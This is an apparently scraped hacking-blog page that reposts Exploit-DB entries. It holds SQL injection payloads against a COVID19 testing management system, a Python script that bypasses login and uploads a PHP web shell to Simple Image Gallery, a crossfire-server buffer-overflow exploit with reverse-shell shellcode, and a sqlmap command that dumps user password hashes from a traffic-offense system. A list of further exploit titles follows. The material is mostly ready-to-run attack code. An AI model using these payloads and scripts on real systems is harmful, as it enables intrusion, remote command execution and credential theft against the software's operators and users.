# Exploit Title: COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections
# Date: 17-08-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: V1
# Category: Webapps
# Tested on: Linux/Windows
# Description:
# PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
# Vulnerable Request:
POST /check_availability.php HTTP/1.1
Host: localhost
Content-Length: 12
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/add-phlebotomist.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close
employeeid=1
# Vulnerable Payload:
# Parameter: employeeid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload:
employeeid=1' AND 2323=2323 AND 'gARj'='gARj
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
employeeid=1' AND (SELECT 5982 FROM (SELECT(SLEEP(10)))aPnu) AND 'bDQl'='bDQl
------------------------------------------------------------------------------
# Vulnerable Request:
POST /add-phlebotomist.php HTTP/1.1
Host: localhost
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/add-phlebotomist.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close
empid=1&fullname=dsadas&mobilenumber=1111111111&submit=Submit
# Vulnerable Payload:
# Parameter: empid (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
empid=1' AND (SELECT 4626 FROM (SELECT(SLEEP(10)))jVok) AND 'bqxW'='bqxW&fullname=dsadas&mobilenumber=1111111111&submit=Submit
------------------------------------------------------------------------------
# Vulnerable Request:
POST /edit-phlebotomist.php?pid=6 HTTP/1.1
Host: localhost
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/edit-phlebotomist.php?pid=6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close
empid=1&fullname=dsadas&mobilenumber=1111111111&update=Update
# Vulnerable Payload:
# Parameter: fullname (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
empid=1&fullname=dsadas' AND (SELECT 6868 FROM (SELECT(SLEEP(10)))yvbu) AND 'xVJk'='xVJk&mobilenumber=1111111111&update=Update
------------------------------------------------------------------------------
# Vulnerable Request:
POST /bwdates-report-result.php HTTP/1.1
Host: localhost
Content-Length: 51
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/bwdates-report-ds.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close
fromdate=2021-08-17&todate=2021-08-17&submit=Submit
# Vulnerable Payload:
# Parameter: fromdate (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
fromdate=2021-08-17' AND (SELECT 6977 FROM (SELECT(SLEEP(10)))pNed) AND 'qbnJ'='qbnJ&todate=2021-08-17&submit=Submit
------------------------------------------------------------------------------
# Vulnerable Request:
POST /search-report-result.php HTTP/1.1
Host: localhost
Content-Length: 27
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/search-report.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close
serachdata=32&search=Search
# Vulnerable Payload:
# Parameter: serachdata (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
serachdata=1231') AND (SELECT 1275 FROM (SELECT(SLEEP(10)))queW) AND ('HkZa'='HkZa&search=Search
# Type: UNION query
# Title: Generic UNION query (NULL) - 7 columns
# Payload:
serachdata=1231') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71706b7671,0x4a6d476c4861544c4c66446b6961755076707354414d6f5150436c766f6b4a624955625159747a4d,0x7170717071),NULL,NULL-- -&search=Search
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141526
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 17.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
# Version: V 1.0
# Tested on: Ubuntu
import requests
import random
import string
import json
from bs4 import BeautifulSoup
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
session = requests.session()
print("Login Bypass")
request_url = url + "/classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
data = json.loads(bypassUser.text)
status = data["status"]
if status == "success":
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
shellname = 'Tago'+shellname+'Letta'
print("shell name "+shellname)
print("\nprotecting user")
request_url = url + "?page=user"
getHTML = session.get(request_url)
getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
ids = getHTMLParser.find('input', {'name':'id'}).get("value")
firstname = getHTMLParser.find('input', {'id':'firstname'}).get("value")
lastname = getHTMLParser.find('input', {'id':'lastname'}).get("value")
username = getHTMLParser.find('input', {'id':'username'}).get("value")
print("\nUser ID : " + ids)
print("Firsname : " + firstname)
print("Lasname : " + lastname)
print("Username : " + username + "\n")
print("shell uploading")
request_url = url + "/classes/Users.php?f=save"
request_headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary9nI3gVmJoEZoZyeA"}
request_data = "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA--\r\n"
upload = session.post(request_url, headers=request_headers, data=request_data)
if upload.text == "1":
print("- OK -")
req = session.get(url + "/?page=user")
parser = BeautifulSoup(req.text, 'html.parser')
find_shell = parser.find('img', {'id':'cimg'})
print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
else:
print("- NO :( -")
else:
print("No bypass user")
# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236
#!/bin/python
import socket
import time
# Crash at 4379
# EIP Offset at 4368
# Badchar \x00\x20
# ECX Size 170
# CALL ECX 0x080640eb
size = 4379
# Attacker IP: 127.0.0.1 Port: 443
shellcode = b""
shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28"
shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17"
shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02"
shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56"
shellcode += b"\x6b\xd1\x7d\xe8\xc2\x57\x87\x80\xab\xa7\x77"
shellcode += b"\x51\x3c\xaa\x77\x50\x07\x23\x96\xe2\x11\x64"
shellcode += b"\x08\x51\x6d\x87\x23\xb4\x5c\x08\x61\x5e\x31"
shellcode += b"\x26\xf5\xf6\xa5\x17\xd6\x64\x5f\xe1\xcb\x3a"
shellcode += b"\xcc\x78\xea\x0a\xf9\xb7\x6d"
try:
filler = "\x90"*(4368 - 170) + shellcode+"\x90"*(170-len(shellcode))
EIP = "\xeb\x40\x06\x08"
padding = "C" * (4379 - len(filler) - len(EIP))
payload = filler + EIP + padding
inputBuffer = "\x11(setup sound "+ payload +"\x90\x00#"
print("Sending Buffer with size:" + str(len(payload)))
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.connect(("192.168.1.4",13327)) # Server IP Address: 192.168.1.4
print(s.recv(1024))
s.send(inputBuffer)
s.close()
except:
print("Could not connect")
exit(0)
# Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 19/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## SQL Injection
# Vulnerable page
http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=
#Vulnerable paramater
The id paramater is Vulnerable to sqli
#POC
going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page.
Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5
Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10
Using sqlmap with dump database
sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump
+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated |
+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
| 1 | 1 | uploads/1624240500_avatar.png | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2021-06-21 09:55:07 |
| 9 | 2 | uploads/1629336240_avatar.jpg | Smith | 202cb962ac59075b964b07152d234b70 (123) | jsmith1 | John | 2021-08-19 09:24:25 | NULL | 2021-08-19 19:14:58 |
+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
Charity Management System CMS 1.0 - Multiple Vulnerabilities
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
ProcessMaker 3.5.4 - Local File inclusion
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Bus Pass Management System 1.0 - 'viewid' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Umbraco CMS 8.9.1 - Directory Traversal
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Laundry Booking Management System 1.0 - 'Multiple' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Strapi 3.0.0-beta - Set Password (Unauthenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view